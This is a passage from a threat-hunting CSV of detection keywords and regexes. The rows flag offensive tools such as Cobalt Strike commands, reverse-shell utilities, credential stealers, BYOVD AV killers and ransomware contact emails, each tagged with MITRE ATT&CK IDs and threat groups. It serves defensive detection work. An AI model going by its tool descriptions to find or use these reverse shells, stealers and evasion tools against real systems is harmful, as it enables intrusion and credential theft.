adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36003" "*bkerberos_ticket_use*",".{0,1000}bkerberos_ticket_use.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36004" "*bkeylogger*",".{0,1000}bkeylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36005" "*bks2john.py*",".{0,1000}bks2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","36007" "*blackarch.cs.nycu.edu.tw/*/os/*",".{0,1000}blackarch\.cs\.nycu\.edu\.tw\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36008" "*blackarch.leneveu.fr/*/os/*",".{0,1000}blackarch\.leneveu\.fr\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation 
OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36009" "*blackarch.mirror.digitalpacific.com.au/*/os/*",".{0,1000}blackarch\.mirror\.digitalpacific\.com\.au\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36010" "*blackarch.mirror.garr.it/mirrors/blackarch/*/os/*",".{0,1000}blackarch\.mirror\.garr\.it\/mirrors\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36011" "*blackarch.org/blackarch/*/os/*",".{0,1000}blackarch\.org\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36012" "*blackarch.org/blackarch/blackarch/*/os/*",".{0,1000}blackarch\.org\/blackarch\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36013" "*blackarch.unixpeople.org/*/os/*",".{0,1000}blackarch\.unixpeople\.org\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - 
T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36014" "*blackarch/tree/master/packages/rustcat*",".{0,1000}blackarch\/tree\/master\/packages\/rustcat.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","36015" "*blackarrowsec/mssqlproxy*",".{0,1000}blackarrowsec\/mssqlproxy.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","36016" "*blackarrowsec/pivotnacci*",".{0,1000}blackarrowsec\/pivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","36017" "*blacklanternsecurity/MANSPIDER*",".{0,1000}blacklanternsecurity\/MANSPIDER.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","36018" "*blacklanternsecurity/trevorproxy*",".{0,1000}blacklanternsecurity\/trevorproxy.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","36019" "*blacklanternsecurity/TREVORspray*",".{0,1000}blacklanternsecurity\/TREVORspray.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","36020" "*Blackout.exe *",".{0,1000}Blackout\.exe\s.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","36021" "*Blackshades Database Viewer*",".{0,1000}Blackshades\sDatabase\sViewer.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - 
TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","36022" "*Blackshades NET Web Server*",".{0,1000}Blackshades\sNET\sWeb\sServer.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","36023" "*BlackShell256/ShellPwnsh*",".{0,1000}BlackShell256\/ShellPwnsh.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","1","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","36024" "*blacksnaketeam@armormail.net*",".{0,1000}blacksnaketeam\@armormail\.net.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36025" "*blacksnaketeam@dnmx.org*",".{0,1000}blacksnaketeam\@dnmx\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36026" "*blacksnaketeam@evilmail.to*",".{0,1000}blacksnaketeam\@evilmail\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in 
ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36027" "*blacksnaketeam@onionmail.org*",".{0,1000}blacksnaketeam\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36028" "*blacksnaketeam@protonmail.com*",".{0,1000}blacksnaketeam\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36029" "*BlackSnufkin/GhostDriver*",".{0,1000}BlackSnufkin\/GhostDriver.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","36030" "*BlackSnufkin/NovaLdr*",".{0,1000}BlackSnufkin\/NovaLdr.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","36031" "*Blank Grabber [Builder]""",".{0,1000}Blank\sGrabber\s\[Builder\]\""","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","36032" "*Blank Grabber [Fake Error Builder]""",".{0,1000}Blank\sGrabber\s\[Fake\sError\sBuilder\]\""","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","36033" "*Blank Grabber [File Pumper]""",".{0,1000}Blank\sGrabber\s\[File\sPumper\]\""","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","36034" "*Blank-c/Blank-Grabber*",".{0,1000}Blank\-c\/Blank\-Grabber.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","36035" "*Blank-c/BlankOBF*",".{0,1000}Blank\-c\/BlankOBF.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python 
programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","1","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","36036" "*BlankOBF v2: Obfuscates Python code to make it unreadable and hard to reverse*",".{0,1000}BlankOBF\sv2\:\sObfuscates\sPython\scode\sto\smake\sit\sunreadable\sand\shard\sto\sreverse.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","36037" "*BlankOBF v2: Obfuscates Python code to make it unreadable and hard to reverse*",".{0,1000}BlankOBF\sv2\:\sObfuscates\sPython\scode\sto\smake\sit\sunreadable\sand\shard\sto\sreverse.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","36038" "*ble_recon.go*",".{0,1000}ble_recon\.go.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","36039" "*blendin/3snake*",".{0,1000}blendin\/3snake.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential 
Access","https://github.com/blendin/3snake","1","1","N/A","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","36040" "*blindSQLPayloads.txt*",".{0,1000}blindSQLPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","36041" "*blitz /* */etc/*",".{0,1000}blitz\s\/.{0,1000}\s.{0,1000}\/etc\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36042" "*blitz -l",".{0,1000}blitz\s\-l","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36043" "*blitz -s *",".{0,1000}blitz\s\-s\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36044" "*blockchain2john.py*",".{0,1000}blockchain2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","36045" "*blockdlls -*",".{0,1000}blockdlls\s\-.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","36046" "*blockdlls start*",".{0,1000}blockdlls\sstart.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36047" "*blockdlls stop*",".{0,1000}blockdlls\sstop.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36048" "*BlockNewProcClient.exe -*",".{0,1000}BlockNewProcClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","36049" "*BlockNewProcDrv_x64.sys*",".{0,1000}BlockNewProcDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","36050" "*BlockOpenHandle.cpp*",".{0,1000}BlockOpenHandle\.cpp.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","36051" 
"*BlockOpenHandle.exe*",".{0,1000}BlockOpenHandle\.exe.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","36052" "*BlockOpenHandle.vcxproj*",".{0,1000}BlockOpenHandle\.vcxproj.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","36053" "*BlockOpenHandle-main*",".{0,1000}BlockOpenHandle\-main.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","36054" "*blog.gentilkiwi.com/securite/vol-de-session-rdp*",".{0,1000}blog\.gentilkiwi\.com\/securite\/vol\-de\-session\-rdp.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral 